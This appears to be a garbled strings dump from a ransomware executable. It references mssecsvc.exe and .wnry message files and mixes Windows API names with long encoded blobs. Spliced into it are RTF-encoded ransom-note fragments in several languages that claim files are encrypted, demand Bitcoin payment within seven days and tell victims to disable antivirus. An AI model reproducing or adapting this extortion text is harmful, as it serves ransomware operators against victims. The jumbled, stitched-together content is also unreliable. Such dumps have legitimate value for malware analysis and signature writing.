iwsczJQE4XaI5LAsPBqpZhKnk6hvi+BYFJQPY3EErRBlIh1MFL7KnW3hroMlMUOaICr+hANsZvjgdN2HTldlqqwzUppld56Mjpy0lLCHljvKmjZyJhfgIwzlgk+wd4qQQGh1XAAV9d0Q5nTA9nWn8x5epjMix1c2jLx+Vdsz3DmzJ5hH32kHEdrxs3iIypHAdC4LXlzG8oKa1+XeHsGFyHSD1qFewdGpRdw4ilEHJHTT9XAKTFOzlP3iM8c9VJXAo96k4GU1EYMobVLqnC9zLwG2+eKzZsgPNE1 j2we/eOEgsdJaALstzzVll0rPXIF501SIOmrcFEJh8lIEf8pW1daYqgEMXZ/1BpUzwMWD5jXvWQa+axhtIilVnEC1OwTGy3wi/r9LcDedgTXOnANzcYcUctIQTk1i2YSbSbAXQGfcsOz8WuTaRM6izqBTyXIK9tN11KVs795Y4BbKeIypCrVHOUY6Y2OtaHS9GhqoGojWs39jjKb9sPkWulrHwPEUl9A42NyUza+S6awW/ySODRkWkTKYS2zyEAso0k4KR4hl2KvJFDnwX157Hp1rsfwS2BCFjByigWVbdT5GMi0HaSukFUskn3ghnVP1G9fWhI7XzVi4XXu+uzDfYNainzFux7CUA33IhPTet1KPoVrQZYwzyjpv52sBPWG4RSCKDYRR+QUo0Pte8/0ix4PGf/VFzxDB+C3pHP2HGNsNX9zT9FJZLgOld40WLdof0IsgNeTLUVyy+o0FL/xp1+J0UQgpb71qWilo8RDEZqcFle9+FdGTlnR4ZcbgG7j1Td/YltwmCAZsTFbCQwmDls8KmZlvzaz4qOOLTuVAyX2e6HKfuPQmzs8X6rGnDTqtFvEELPjWtEQsxs8d1krRZO3FYFUUTeWphjMefQjj745faY6AHmnLK8sir5aG7B6v6OsqHGZ/UXDTPDCCbIBdz2ohdHbKAMH0rka/vVZXeQ8AdSwIOK8j792KDUQFq2BoEEHoOLmwCCg4D0Sbuyh+CcSDYyRiwsczJQE4XaI5LAsPBqpZhKnk6hvi+BYFJQPY3EErRBlIh1MFL7KnW3hroMlMUOaICr+hANsZvjgdN2HTldlqqwzUppld56Mjpy0lLCHljvKmjZyJhfgIwzlgk+wd4qQQGh1XAAV9d0Q5nTA9nWn8x5epjMix1c2jLx+Vdsz3DmzJ5hH32kHEdrxs3iIypHAdC4LXlzG8oKa1+XeHsGFyHSD1qFewdGpRdw4ilEHJHTT9XAKTFOzlP3iM8c9VJXAo96k4GU1EYMobVLqnC9zLwG2+eKzZsgPNE1g je\\'9c\\loch\\f31528 \\hich\\f31528 li nie zap\\'b3\\loch\\f31528 \\hich\\f31528 acisz za 7 dni, nie b\\'ea\\loch\\f31528 \\hich\\f31528 dziesz w stanie odzyska\\'e6\\loch\\f31528 \\hich\\f31528 plik\\'f3\\loch\\f31528 w na zawsze. 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 kh\\'f4\\loch\\f31502 ng th}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 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 lhdfrgui.exe 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 loating point support not loaded Local AppData LocalAlloc LocalFileTimeToFileTime LocalFree LocalizedName LocalRedirectOnly lp, skicka ett meddelande genom att klicka p\\'e5\\loch\\f31502 <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid13779469 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 Contact Us}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid15532574\\charrsid13779469 m ditt antivirusprogram uppdateras och tar bort denna programvara automatiskt kommer det inte att kunna \\'e5\\loch\\f31502 \\hich\\f31502 terst\\'e4\\loch\\f31502 \\hich\\f31502 lla dina filer \\'e4\\loch\\f31502 ven om du betalar! Marami sa iyong mga dokumento, mga larawan, video, database at iba pang mga file ay hindi na maa-access dahil ang mga ito ay nai-naka-encrypt. Siguro ikaw ay abala naghahanap para sa isang paraan upang mabawi ang iyong mga file, ngunit huwag mag-aksaya ng Masidhi naming inirerekumenda mong hindi nag-aalis ng software na ito, at huwag paganahin ang iyong mga anti-virus para sa isang habang, hanggang mong bayaran at ang pagbabayad ay makakakuha ng maproseso. Kung ang iyong anti-virus ay maka MaxConnectionsPer1_0Server MaxConnectionsPerProxy MaxConnectionsPerServer MaxHttpRedirects MaxNumberOfAddressesToRegister MBCSAPIforCrack mHtyDZcsrtT4/t3O+3smlSCOHOGPecD9WyHiK92g6U5yU6Vdp+2G55TU6O6bn1RKpsDc72Sxo+90XrB+LrX5vDSrEDUR/IysjuJsc4H0TpeaymDzHHgsslBVRtSXS2U7cq0tTBn5CKG9GQXszRDXYMSWv1neD/ck3/WeENtYPgaKe07GCLe3NnD1KEcCuVi4RzmirigWnyXpYe/OHyaE4nj68lfZp0STShgCZ79X1L4U6OI7N4jy9NIHnLKKKBnFg6OnzXUsUTyHSjMoXAjTVzInamuKVdwwhDEBO9Ef9IvNy/4yK7AoGojq4H2qDjCIcTMo5EZMtoLRFWEZSIJmcwfZVl61GrQIsdzeNzQe6gdZHIEyMINUeJ844dqB9GPPp8//yTT66cf8MEL6Jo6wU1jp7LbV4lcAPDpY3v/6Deg+d9Qa3nKUN4dygf5cnq704De/LQ4yD99dWMxFnDNC2pqxR5PwjMSZEu1iS8eTgboOG0EtWkXMSByt6YvBIDqliVbeHCKKWQP0J+x/Fdb05sHN0L50yOqAfnMgSQUGrWyWOj8dg8gkv8cNFwSCYUtsQwyV3wBnWPStAvJ3C6f8Ff1lbEdhh3dqMvjWYyOT+IQ1mB+gy9DW7IQVzhU9zUptVV/8VjL/hXt/KYuLk1jfc2WkjOvz5rw8+RfAqZsGzjt1itVoqxU57HOqksFATmVOVv14hLGdSeH/JRREmcrnd3g6sSoXT9rgK/HbSvCodEBpdhyk7KFGfibeIycvcYUzsjwocNZMiyot6qMjjKIAC6sFjD+f9N6o0wUogWamhbQuQW8SyVyn7zlvs8Xc9zGyZ21D52jGt5gzUNIz5+rzOSitaSQRuFWurwhEdVImJvssG3yEs0/ZSA5RGkwlX0z2Zupbod+1Y4dYgvVmE9JSmet0QqeSEB5gFqS8ae8IzOHGKmgbE3tuPj4Er6htDgOJG0LL7QlL0Mam56IDW2JatOw+UHSFfCa6xtiM1SZjFEqBoSkIZzUh3ufg1/BgaN9 mHtyDZcsrtT4/t3O+3smlSCOHOGPecD9WyHiK92g6U5yU6Vdp+2G55TU6O6bn1RKpsDc72Sxo+90XrB+LrX5vDSrEDUR/IysjuJsc4H0TpeaymDzHHgsslBVRtSXS2U7cq0tTBn5CKG9GQXszRDXYMSWv1neD/ck3/WeENtYPgaKe07GCLe3NnD1KEcCuVi4RzmirigWnyXpYe/OHyaE4nj68lfZp0STShgCZ79X1L4U6OI7N4jy9NIHnLKKKBnFg6OnzXUsUTyHSjMoXAjTVzInamuKVdwwhDEBO9Ef9IvNy/4yK7AoGojq4H2qDjCIcTMo5EZMtoLRFWEZSIJmcwfZVl61GrQIsdzeNzQe6gdZHIEyMINUeJ844dqB9GPPp8//yTT66cf8MEL6Jo6wU1jp7LbV4lcAPDpY3v/6Deg+d9Qa3nKUN4dygf5cnq704De/LQ4yD99dWMxFnDNC2pqxR5PwjMSZEu1iS8eTgboOG0EtWkXMSByt6YvBIDqliVbeHCKKWQP0J+x/Fdb05sHN0L50yOqAfnMgSQUGrWyWOj8dg8gkv8cNFwSCYUtsQwyV3wBnWPStAvJ3C6f8Ff1lbEdhh3dqMvjWYyOT+IQ1mB+gy9DW7IQVzhU9zUptVV/8VjL/hXt/KYuLk1jfc2WkjOvz5rw8+RfAqZsGzjt1itVoqxU57HOqksFATmVOVv14hLGdSeH/JRREmcrnd3g6sSoXT9rgK/HbSvCodEBpdhyk7KFGfibeIycvcYUzsjwocNZMiyot6qMjjKIAC6sFjD+f9N6o0wUogWamhbQuQW8SyVyn7zlvs8Xc9zGyZ21D52jGt5gzUNIz5+rzOSitaSQRuFWurwhEdVImJvssG3yEs0/ZSA5RGkwlX0z2Zupbod+1Y4dYgvVmE9JSmet0QqeSEB5gFqS8ae8IzOHGKmgbE3tuPj4Er6htDgOJG0LL7QlL0Mam56IDW2JatOw+UHSFfCa6xtiM1SZjFEqBoSkIZzUh3ufg1/BgaN9a Microsoft Security Center (2.0) Service Microsoft Visual C++ Runtime Library MinSockaddrLength mscoree.dll msg/m_chinese (simplified).wnry msg/m_chinese (simplified).wnryR9 msg/m_chinese (traditional).wnry msg/m_portuguese.wnry mssecsvc.exe mu8ZiCou+4Y9PFE2Aq/JP73dKOewZib9zIPfPrjyONiobPbo1bCl/m+TSdhqUh5FYmcxDK9ISe0ElEdgkTOm6Nix8wvPsODOynqdIeS4JkPGwOBxnp678RIFb24/AnQdHhRFPOl2CEJKX+CH1pmztWjhR+6blLrvP/+UKFwewIrG58534tZfUzl2UQtv7ezYAPP3C0vvWzfSfUJpDPOpgbVTvJyI+3r/g0FhmSJaSIWIKiOIh245BAVrrJ/ZkjMSbu57KCiySaIJdi2+ltpquy0TFCfM2kcGju1SPq3SFDLSN/E3I8TO7WWeIA3Qntm5VqlK2bs8zoaIVgcF4tWs3xpdavYegL1N/96CZdqaJMKfY76tApl6VdxB/vvqc+X2l2uqGAPDpefagUipGU/dpIuJBTMluL5OnrYTs3PqAJpoq0154OyHtwvgrab7nhJFZXa/vl4CnWEXhQ3UUvlQHBhVoqSYRqeE/EKiJjaJtKhL3V+a+PQVniOOylW77dGba3F3h/aQJgZ/7+33utKuh+9eSAJdPZlhNQmncsmObaUJRYxGkYz+ShjASOOqH2ev3aT0Zpx4SvbZBcYF/A1yoX8W7lD0CHMIhogHgmauAu1g1DHViPB+qZgx108f1PxpwfKkG n 7 zile, nu ve}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid8458214\\charrsid12743656 n kh\\'f4\\loch\\f31502 \\hich\\f31502 ng c\\'f2\\loch\\f31502 \\hich\\f31502 n c\\'f3\\loch\\f31502 th}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 n vain Bitcoinissa. Saat lis\\'e4\\loch\\f31502 tietoja napsauttamalla <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid11698073 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 About}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid5593755\\charrsid11698073 n, haga clic en <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 About b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid13056521\\charrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 itcoin>. n, haga clic en <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 How to buy}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid13056521\\charrsid16268367 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 bitcoins>. 